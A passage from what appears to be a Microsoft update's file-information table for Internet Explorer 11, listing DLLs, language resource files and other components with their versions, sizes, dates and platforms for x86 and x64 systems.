11-Jun-2016| 20:02| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,664| 11-Jun-2016| 20:02| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,640| 11-Jun-2016| 20:02| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,664| 21-Nov-2019| 03:11| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,640| 11-Jun-2016| 20:02| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,128| 11-Jun-2016| 19:59| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 49,152| 11-Jun-2016| 19:58| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 48,128| 11-Jun-2016| 19:58| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 35,328| 11-Jun-2016| 19:58| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 35,328| 11-Jun-2016| 20:02| Not applicable \nUrlmon.dll.mui| 11.0.9600.18378| 35,328| 11-Jun-2016| 20:02| Not applicable \nJsproxy.dll| 11.0.9600.17416| 39,936| 31-Oct-2014| 02:43| Not applicable \nWininet.dll| 11.0.9600.19572| 4,147,712| 19-Nov-2019| 16:34| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 114,176| 07-Sep-2017| 22:24| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 130,560| 07-Sep-2017| 22:24| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 124,928| 07-Sep-2017| 22:24| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 122,880| 07-Sep-2017| 22:24| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 130,048| 07-Sep-2017| 22:24| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 138,240| 07-Sep-2017| 22:23| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 114,688| 07-Sep-2017| 22:23| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18698| 114,688| 14-May-2017| 19:41| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 131,584| 07-Sep-2017| 22:23| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 117,760| 07-Sep-2017| 22:23| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 122,368| 07-Sep-2017| 22:23| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 134,144| 07-Sep-2017| 22:24| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 107,008| 07-Sep-2017| 22:23| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18838| 123,392| 14-Oct-2017| 07:14| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 127,488| 07-Sep-2017| 22:24| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 128,512| 07-Sep-2017| 22:23| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 88,064| 07-Sep-2017| 22:23| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18838| 82,944| 14-Oct-2017| 07:14| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 125,440| 07-Sep-2017| 22:23| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 123,392| 07-Sep-2017| 22:23| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 120,320| 07-Sep-2017| 22:23| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 130,560| 07-Sep-2017| 22:24| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 129,024| 07-Sep-2017| 22:23| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 125,952| 07-Sep-2017| 22:24| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 129,024| 07-Sep-2017| 22:24| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 128,000| 07-Sep-2017| 22:24| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 123,904| 07-Sep-2017| 22:24| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 129,024| 07-Sep-2017| 22:24| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 123,904| 07-Sep-2017| 22:24| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 124,416| 21-Nov-2019| 03:11| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 121,856| 07-Sep-2017| 22:24| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 115,712| 07-Sep-2017| 22:21| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 123,904| 07-Sep-2017| 22:21| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 125,440| 07-Sep-2017| 22:22| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 74,752| 07-Sep-2017| 22:21| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 75,776| 07-Sep-2017| 22:23| Not applicable \nInetcpl.cpl.mui| 11.0.9600.18817| 75,776| 07-Sep-2017| 22:24| Not applicable \nIeui.dll| 11.0.9600.19101| 427,520| 19-Jul-2018| 03:30| Not applicable \nIedkcs32.dll| 18.0.9600.19537| 292,864| 11-Oct-2019| 01:25| Not applicable \nInstall.ins| Not applicable| 464| 19-Nov-2019| 15:24| Not applicable \nIeapfltr.dat| 10.0.9301.0| 616,104| 24-Sep-2013| 02:22| Not applicable \nIeapfltr.dll| 11.0.9600.19572| 548,352| 19-Nov-2019| 16:37| Not applicable \nIepeers.dll| 11.0.9600.19507| 107,008| 06-Oct-2019| 02:22| Not applicable \nLicmgr10.dll| 11.0.9600.17416| 23,552| 31-Oct-2014| 02:34| Not applicable \nTdc.ocx| 11.0.9600.18698| 61,952| 14-May-2017| 18:43| Not applicable \nDiagnosticshub.datawarehouse.dll| 11.0.9600.17416| 495,616| 31-Oct-2014| 02:52| Not applicable \nIedvtool.dll| 11.0.9600.19537| 726,016| 11-Oct-2019| 01:35| Not applicable \nDiagnosticshub_is.dll| 11.0.9600.17416| 38,912| 31-Oct-2014| 02:53| Not applicable \nDxtmsft.dll| 11.0.9600.18052| 368,640| 10-Sep-2015| 15:57| Not applicable \nDxtrans.dll| 11.0.9600.19507| 221,696| 06-Oct-2019| 02:21| Not applicable \nMicrosoft-windows-ie-f12-provider.ptxml| Not applicable| 11,892| 15-Aug-2014| 22:50| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 11:18| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 11:18| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 11:19| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 11:19| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 11:19| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 11:20| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 01:39| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 11:19| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 11:18| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 11:27| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 11:28| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 11:27| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 11:27| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 11:27| Not applicable \nF12.dll.mui| 11.0.9600.17278| 3,584| 16-Aug-2014| 11:18| Not applicable \nF12.dll.mui| 11.0.9600.17278| 3,584| 16-Aug-2014| 11:19| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 11:18| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 11:17| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 11:18| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 11:18| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 11:19| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 11:18| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 11:18| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 11:18| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 11:27| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 11:27| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 11:26| Not applicable \nF12.dll.mui| 11.0.9600.19572| 4,096| 21-Nov-2019| 03:12| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 11:26| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 11:27| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 11:26| Not applicable \nF12.dll.mui| 11.0.9600.17278| 4,096| 16-Aug-2014| 11:26| Not applicable \nF12.dll.mui| 11.0.9600.17278| 3,584| 16-Aug-2014| 11:27| Not applicable \nF12.dll.mui| 11.0.9600.17278| 3,584| 16-Aug-2014| 11:19| Not applicable \nF12.dll.mui| 11.0.9600.17278| 3,584| 16-Aug-2014| 11:18| Not applicable \nDiagnosticstap.dll| 11.0.9600.19180| 174,592| 18-Oct-2018| 03:55| Not applicable \nF12resources.dll| 11.0.9600.17496| 10,948,608| 22-Nov-2014| 01:44| Not applicable \nF12tools.dll| 11.0.9600.19507| 263,168| 06-Oct-2019| 02:28| Not applicable \nF12.dll| 11.0.9600.19507| 1,184,256| 06-Oct-2019| 02:20| Not applicable \nMsfeeds.dll| 11.0.9600.19572| 587,776| 19-Nov-2019| 16:53| Not applicable \nMsfeeds.mof| Not applicable| 1,518| 06-Feb-2014| 05:51| Not applicable \nMsfeedsbs.dll| 11.0.9600.17416| 43,008| 31-Oct-2014| 02:26| Not applicable \nMsfeedsbs.mof| Not applicable| 1,574| 21-Aug-2013| 23:43| Not applicable \nMsfeedssync.exe| 11.0.9600.16384| 11,776| 22-Aug-2013| 03:05| Not applicable \nMshtmled.dll| 11.0.9600.19507| 73,216| 06-Oct-2019| 02:23| Not applicable \nMicrosoft-windows-ie-htmlrendering.ptxml| Not applicable| 3,228| 06-Feb-2014| 05:39| Not applicable \nMshtml.dll| 11.0.9600.19572| 16,227,840| 19-Nov-2019| 16:48| Not applicable \nMshtml.tlb| 11.0.9600.16518| 2,724,864| 06-Feb-2014| 09:36| Not applicable \nIeadvpack.dll| 11.0.9600.16384| 98,816| 22-Aug-2013| 02:54| Not applicable \nIeetwcollector.exe| 11.0.9600.18658| 98,816| 05-Apr-2017| 17:29| Not applicable \nIeetwcollectorres.dll| 11.0.9600.16518| 4,096| 06-Feb-2014| 09:36| Not applicable \nIeetwproxystub.dll| 11.0.9600.16518| 43,008| 06-Feb-2014| 09:23| Not applicable \nIelowutil.exe| 11.0.9600.17031| 222,208| 22-Feb-2014| 09:32| Not applicable \nIeproxy.dll| 11.0.9600.19537| 297,472| 11-Oct-2019| 01:06| Not applicable \nIeshims.dll| 11.0.9600.19507| 268,800| 06-Oct-2019| 02:01| Not applicable \nImgutil.dll| 11.0.9600.18123| 35,328| 08-Nov-2015| 20:20| Not applicable \nBing.ico| Not applicable| 5,430| 24-Sep-2013| 02:51| Not applicable \nIeunatt.exe| 11.0.9600.16518| 112,128| 06-Feb-2014| 09:12| Not applicable \nMicrosoft-windows-ie-internetexplorer-ppdlic.xrm-ms| Not applicable| 2,956| 21-Nov-2019| 02:44| Not applicable \nWindows feed discovered.wav| Not applicable| 19,884| 24-Sep-2013| 03:25| Not applicable \nWindows information bar.wav| Not applicable| 23,308| 24-Sep-2013| 03:25| Not applicable \nWindows navigation start.wav| Not applicable| 11,340| 24-Sep-2013| 03:25| Not applicable \nWindows pop-up blocked.wav| Not applicable| 85,548| 24-Sep-2013| 03:25| Not applicable \nJsdbgui.dll| 11.0.9600.17905| 457,216| 15-Jun-2015| 19:46| Not applicable \nJsprofilerui.dll| 11.0.9600.19507| 574,976| 06-Oct-2019| 02:24| Not applicable \nMemoryanalyzer.dll| 11.0.9600.17905| 1,934,848| 15-Jun-2015| 20:00| Not applicable \nMshtmldac.dll| 11.0.9600.19507| 60,928| 06-Oct-2019| 02:40| Not applicable \nNetworkinspection.dll| 11.0.9600.19537| 1,105,408| 11-Oct-2019| 01:30| Not applicable \nDesktop.ini| Not applicable| 65| 18-Jun-2013| 14:46| Not applicable \nOccache.dll| 11.0.9600.19507| 121,856| 06-Oct-2019| 02:20| Not applicable \nDesktop.ini| Not applicable| 65| 18-Jun-2013| 14:46| Not applicable \nWebcheck.dll| 11.0.9600.19537| 201,216| 11-Oct-2019| 01:26| Not applicable \nMsdbg2.dll| 12.0.20712.1| 295,320| 26-Jul-2013| 17:03| Not applicable \nPdm.dll| 12.0.20712.1| 420,752| 26-Jul-2013| 17:03| Not applicable \nPdmproxy100.dll| 12.0.20712.1| 76,712| 26-Jul-2013| 17:03| Not applicable \nIcrav03.rat| Not applicable| 8,798| 24-Sep-2013| 02:32| Not applicable \nMsrating.dll| 11.0.9600.17905| 157,184| 15-Jun-2015| 19:46| Not applicable \nTicrf.rat| Not applicable| 1,988| 24-Sep-2013| 02:32| Not applicable \nIertutil.dll| 11.0.9600.19537| 2,182,144| 11-Oct-2019| 01:45| Not applicable \nIe4uinit.exe| 11.0.9600.19537| 677,888| 11-Oct-2019| 01:24| Not applicable \nIernonce.dll| 11.0.9600.16518| 28,160| 06-Feb-2014| 09:15| Not applicable \nIesetup.dll| 11.0.9600.16518| 59,904| 06-Feb-2014| 09:23| Not applicable \nInseng.dll| 11.0.9600.16384| 77,312| 22-Aug-2013| 02:35| Not applicable \nIesysprep.dll| 11.0.9600.17416| 87,552| 31-Oct-2014| 02:28| Not applicable \nTimeline.dll| 11.0.9600.19507| 155,136| 06-Oct-2019| 02:25| Not applicable \nTimeline.cpu.xml| Not applicable| 3,197| 24-Jul-2014| 19:09| Not applicable \nTimeline_is.dll| 11.0.9600.17416| 129,536| 31-Oct-2014| 02:43| Not applicable \nVgx.dll| 11.0.9600.19507| 734,208| 06-Oct-2019| 02:23| Not applicable \nUrl.dll| 11.0.9600.17416| 236,032| 31-Oct-2014| 02:49| Not applicable \nIeframe.dll.mui| 11.0.9600.19537| 2,066,432| 11-Oct-2019| 02:52| Not applicable \nIeframe.dll.mui| 11.0.9600.19537| 2,120,704| 11-Oct-2019| 02:52| Not applicable \nIeframe.dll.mui| 11.0.9600.19537| 2,075,136| 11-Oct-2019| 02:52| Not applicable \nIeframe.dll.mui| 11.0.9600.19537| 2,063,360| 11-Oct-2019| 02:52| Not applicable \nIeframe.dll.mui| 11.0.9600.19537| 2,313,728| 11-Oct-2019| 02:52| Not applicable \nIeframe.dll.mui| 11.0.9600.19537| 2,390,016| 11-Oct-2019| 02:52| Not applicable \nIeframe.dll.mui| 11.0.9600.19537| 2,033,664| 11-Oct-2019| 02:52| Not applicable \nIeframe.dll.mui| 11.0.9600.19537| 2,032,640| 11-Oct-2019| 02:22| Not applicable \nIeframe.dll.mui| 11.0.9600.19537| 2,307,584| 11-Oct-2019| 02:52| Not applicable \nIeframe.dll.mui| 11.0.9600.19537| 2,255,360| 11-Oct-2019| 02:52| Not applicable \nIeframe.dll.mui| 11.0.9600.19537| 2,061,312| 11-Oct-2019| 02:52| Not applicable \nIeframe.dll.mui| 11.0.9600.19537| 2,325,504| 11-Oct-2019| 02:52| Not applicable \nIeframe.dll.mui| 11.0.9600.19537| 2,019,840| 11-Oct-2019| 02:52| Not applicable \nIeframe.dll.mui| 11.0.9600.19537| 2,070,528| 11-Oct-2019| 02:52| Not applicable \nIeframe.dll.mui| 11.0.9600.19537| 2,082,304| 11-Oct-2019| 02:52| Not applicable \nIeframe.dll.mui| 11.0.9600.19537| 2,307,072| 11-Oct-2019| 02:53| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,170,368| 21-Nov-2019| 03:13| Not applicable \nIeframe.dll.mui| 11.0.9600.19537| 2,153,984| 11-Oct-2019| 02:53| Not applicable \nIeframe.dll.mui| 11.0.9600.19537| 2,291,712| 11-Oct-2019| 02:53| Not applicable \nIeframe.dll.mui| 11.0.9600.19537| 2,283,520| 11-Oct-2019| 02:53| Not applicable \nIeframe.dll.mui| 11.0.9600.19537| 2,051,584| 11-Oct-2019| 02:53| Not applicable \nIeframe.dll.mui| 11.0.9600.19537| 2,301,440| 11-Oct-2019| 02:53| Not applicable \nIeframe.dll.mui| 11.0.9600.19537| 2,093,056| 11-Oct-2019| 02:53| Not applicable \nIeframe.dll.mui| 11.0.9600.19537| 2,075,136| 11-Oct-2019| 02:52| Not applicable \nIeframe.dll.mui| 11.0.9600.19537| 2,298,880| 11-Oct-2019| 02:51| Not applicable \nIeframe.dll.mui| 11.0.9600.19537| 2,094,080| 11-Oct-2019| 02:51| Not applicable \nIeframe.dll.mui| 11.0.9600.19537| 2,316,800| 11-Oct-2019| 02:51| Not applicable \nIeframe.dll.mui| 11.0.9600.19537| 2,305,024| 11-Oct-2019| 02:52| Not applicable \nIeframe.dll.mui| 11.0.9600.19537| 2,278,912| 11-Oct-2019| 02:51| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,286,080| 21-Nov-2019| 03:12| Not applicable \nIeframe.dll.mui| 11.0.9600.19537| 2,059,776| 11-Oct-2019| 02:52| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,315,264| 21-Nov-2019| 03:10| Not applicable \nIeframe.dll.mui| 11.0.9600.19537| 2,278,912| 11-Oct-2019| 02:49| Not applicable \nIeframe.dll.mui| 11.0.9600.19537| 2,324,480| 11-Oct-2019| 02:49| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,098,176| 21-Nov-2019| 03:10| Not applicable \nIeframe.dll.mui| 11.0.9600.19537| 1,890,304| 11-Oct-2019| 02:52| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 1,890,304| 21-Nov-2019| 03:13| Not applicable \nIeframe.dll| 11.0.9600.19572| 12,277,248| 19-Nov-2019| 16:36| Not applicable \nIeframe.ptxml| Not applicable| 24,486| 06-Feb-2014| 05:38| Not applicable \nInetres.adml| Not applicable| 523,798| 21-Nov-2019| 03:13| Not applicable \nInetres.adml| Not applicable| 497,168| 21-Nov-2019| 03:13| Not applicable \nInetres.adml| Not applicable| 549,601| 21-Nov-2019| 03:13| Not applicable \nInetres.adml| Not applicable| 938,813| 21-Nov-2019| 03:13| Not applicable \nInetres.adml| Not applicable| 455,538| 21-Nov-2019| 02:38| Not applicable \nInetres.adml| Not applicable| 541,364| 21-Nov-2019| 03:13| Not applicable \nInetres.adml| Not applicable| 523,828| 21-Nov-2019| 03:13| Not applicable \nInetres.adml| Not applicable| 573,051| 21-Nov-2019| 03:12| Not applicable \nInetres.adml| Not applicable| 567,797| 21-Nov-2019| 03:14| Not applicable \nInetres.adml| Not applicable| 545,645| 21-Nov-2019| 03:12| Not applicable \nInetres.adml| Not applicable| 635,718| 21-Nov-2019| 03:12| Not applicable \nInetres.adml| Not applicable| 522,947| 21-Nov-2019| 03:12| Not applicable \nInetres.adml| Not applicable| 486,171| 21-Nov-2019| 03:13| Not applicable \nInetres.adml| Not applicable| 546,070| 21-Nov-2019| 03:12| Not applicable \nInetres.adml| Not applicable| 556,258| 21-Nov-2019| 03:13| Not applicable \nInetres.adml| Not applicable| 532,548| 21-Nov-2019| 03:12| Not applicable \nInetres.adml| Not applicable| 539,045| 21-Nov-2019| 03:12| Not applicable \nInetres.adml| Not applicable| 799,803| 21-Nov-2019| 03:12| Not applicable \nInetres.adml| Not applicable| 501,599| 21-Nov-2019| 03:12| Not applicable \nInetres.adml| Not applicable| 518,930| 21-Nov-2019| 03:09| Not applicable \nInetres.adml| Not applicable| 418,138| 21-Nov-2019| 03:09| Not applicable \nInetres.adml| Not applicable| 434,747| 21-Nov-2019| 03:13| Not applicable \nInetres.adml| Not applicable| 434,747| 21-Nov-2019| 03:13| Not applicable \nInetres.admx| Not applicable| 1,675,975| 19-Nov-2019| 14:58| Not applicable \nInetcomm.dll| 6.3.9600.19572| 675,328| 19-Nov-2019| 16:57| Not applicable \nInetres.dll| 6.3.9600.16384| 84,480| 22-Aug-2013| 03:15| Not applicable \nJscript9.dll| 11.0.9600.19572| 3,572,224| 19-Nov-2019| 16:45| Not applicable \nJscript9diag.dll| 11.0.9600.19507| 557,568| 06-Oct-2019| 02:35| Not applicable \nJscript.dll| 5.8.9600.19572| 519,680| 19-Nov-2019| 17:14| Not applicable \nVbscript.dll| 5.8.9600.19573| 403,456| 21-Nov-2019| 02:15| Not applicable \n \n## Internet Explorer 11 on all supported x64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nActxprxy.dll| 6.3.9600.19301| 2,882,048| 26-Feb-2019| 06:25| x64 \nHlink.dll| 6.3.9600.19101| 108,544| 19-Jul-2018| 04:22| x64 \nPngfilt.dll| 11.0.9600.17416| 64,512| 31-Oct-2014| 05:09| x64 \nUrlmon.dll| 11.0.9600.19572| 1,566,720| 19-Nov-2019| 19:15| x64 \nIexplore.exe| 11.0.9600.19036| 817,296| 25-May-2018| 06:30| x64 \nWininetplugin.dll| 6.3.9600.17416| 43,008| 31-Oct-2014| 04:51| x64 \nWininet.dll.mui| 11.0.9600.18538| 46,592| 12-Nov-2016| 21:35| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 52,736| 12-Nov-2016| 21:34| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 51,200| 12-Nov-2016| 21:34| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 51,200| 12-Nov-2016| 21:34| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 56,320| 12-Nov-2016| 21:34| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 57,856| 13-Nov-2016| 00:01| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 49,664| 12-Nov-2016| 23:59| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 49,664| 12-Nov-2016| 20:20| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 54,272| 13-Nov-2016| 00:00| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 47,616| 12-Nov-2016| 23:59| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 49,152| 12-Nov-2016| 23:58| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 55,296| 12-Nov-2016| 21:34| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 45,056| 13-Nov-2016| 00:02| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 51,712| 12-Nov-2016| 23:57| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 51,712| 12-Nov-2016| 23:57| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 53,248| 12-Nov-2016| 21:38| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 39,424| 12-Nov-2016| 21:39| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 35,840| 12-Nov-2016| 21:38| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 50,176| 12-Nov-2016| 21:38| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 51,200| 12-Nov-2016| 21:38| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 50,688| 12-Nov-2016| 21:39| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 52,736| 12-Nov-2016| 21:38| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 53,760| 12-Nov-2016| 21:39| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 54,272| 12-Nov-2016| 21:38| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 54,272| 12-Nov-2016| 21:39| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 52,736| 12-Nov-2016| 21:38| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 51,200| 12-Nov-2016| 21:38| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 53,248| 12-Nov-2016| 21:37| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 52,736| 12-Nov-2016| 21:37| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,712| 21-Nov-2019| 04:25| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 50,688| 12-Nov-2016| 21:37| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 50,688| 12-Nov-2016| 21:27| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 50,176| 12-Nov-2016| 21:27| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 50,176| 12-Nov-2016| 21:27| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 31,232| 12-Nov-2016| 21:27| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 31,232| 12-Nov-2016| 21:34| Not applicable \nWininet.dll.mui| 11.0.9600.18538| 31,232| 12-Nov-2016| 21:34| Not applicable \nHtml.iec| 2019.0.0.19301| 417,280| 26-Feb-2019| 07:31| Not applicable \nInetcpl.cpl| 11.0.9600.19541| 2,132,992| 24-Oct-2019| 02:51| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 307,200| 10-Jul-2019| 05:16| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 293,888| 10-Jul-2019| 05:16| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 290,304| 10-Jul-2019| 05:16| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 289,280| 10-Jul-2019| 05:17| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 299,008| 10-Jul-2019| 05:18| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 303,104| 10-Jul-2019| 05:15| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 282,112| 10-Jul-2019| 05:15| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 282,112| 10-Jul-2019| 04:33| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 296,960| 10-Jul-2019| 05:15| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 283,648| 10-Jul-2019| 05:15| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 291,840| 10-Jul-2019| 05:16| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 299,520| 10-Jul-2019| 05:18| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 275,968| 10-Jul-2019| 05:15| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 290,816| 10-Jul-2019| 05:12| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 293,376| 10-Jul-2019| 05:12| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 296,960| 10-Jul-2019| 07:26| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 258,048| 10-Jul-2019| 07:26| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 256,512| 10-Jul-2019| 07:25| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 289,280| 10-Jul-2019| 07:25| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 288,256| 10-Jul-2019| 07:25| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 285,184| 10-Jul-2019| 07:25| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 295,424| 10-Jul-2019| 07:26| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 297,472| 10-Jul-2019| 07:25| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 292,864| 10-Jul-2019| 05:12| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 295,424| 10-Jul-2019| 05:13| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 294,400| 10-Jul-2019| 05:12| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 294,400| 10-Jul-2019| 05:12| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 292,864| 10-Jul-2019| 05:12| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 290,816| 10-Jul-2019| 05:12| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 290,816| 21-Nov-2019| 04:26| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 286,208| 10-Jul-2019| 05:13| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 281,600| 10-Jul-2019| 05:06| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 286,720| 10-Jul-2019| 05:04| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 292,352| 10-Jul-2019| 05:04| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 242,176| 10-Jul-2019| 05:04| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 243,200| 10-Jul-2019| 05:16| Not applicable \nMshtml.dll.mui| 11.0.9600.19404| 243,200| 10-Jul-2019| 05:17| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 73,728| 16-Aug-2014| 11:58| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 67,584| 16-Aug-2014| 11:59| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 67,584| 16-Aug-2014| 11:58| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 74,240| 16-Aug-2014| 12:00| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 78,848| 16-Aug-2014| 11:58| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 61,440| 16-Aug-2014| 11:59| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 61,440| 16-Aug-2014| 03:19| Not applicable \nF12resources.dll.mui| 11.0.9600.17278| 74,752| 16-Aug-2014| 12:00| Not applicable 